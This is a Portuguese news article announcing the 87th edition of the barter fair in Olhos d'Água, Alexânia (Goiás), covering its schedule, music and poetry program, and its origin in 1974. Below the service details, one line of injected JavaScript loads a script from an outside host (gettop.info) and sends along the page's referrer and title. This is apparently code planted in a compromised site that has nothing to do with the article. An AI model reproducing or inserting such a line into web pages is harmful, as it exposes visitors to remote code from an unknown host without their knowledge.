Olhos d’Água respira 87ª Feira do Troca

 

Feira do Troca Troca em Olhos D'agua. Os produtos sao trocados por outros sem troca de moeda/ Exchange fair at Olhos d"agua. Alexania city. Goias state. Brazil
Feira do Troca Troca em Olhos D’Água. Os produtos são trocados por outros sem troca de moeda. Foto: reprodução. 

Acontece neste sábado (3), a partir das 18h, e domingo (4), a 87ª edição da Feira de Troca de Olhos d’Água, no município de Alexânia, a 100 km de Brasília. A feira movimenta a cidade, atraindo turistas e curiosos do DF e de várias cidades goianas. O escambo é a fonte que alimenta essa tradição desde 1974.

A feira é uma grande festa. A cada edição, mais de oito mil pessoas passem por Olhos d’Água. Para este fim de semana estão previstas apresentações de bandas independentes e poetas. A principal atração deste ano é a banda Mente Insana, de Alexânia. Paralelo ao evento acontecerá o Sarau Psicodélico, cuja proposta é a declamação de poesias autorais ou de grandes autores regionais e nacionais. 

É tradição dos artesãos e agricultores de Olhos D’Água trocar seus produtos. Em 1974, a professora da UnB Laís Aderne usou essa característica da cultura regional para criar a Feira do Troca. Atualmente, o escambo por necessidade não mais existe. Permanece, no entanto, a tradição da troca justa, aquela que interessa e proporciona satisfação e prazer para as partes. Um bom produto e uma boa capacidade de negociador continuam sendo a garantia da boa prática do escambo.

Serviço

Feira do Troca de Olhos D’Água

Data: Sábado (3) e domingo (4) de dezembro

Horário: a partir das 18h de sábado

Local: Olhos D’Água – Alexânia (GO)

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário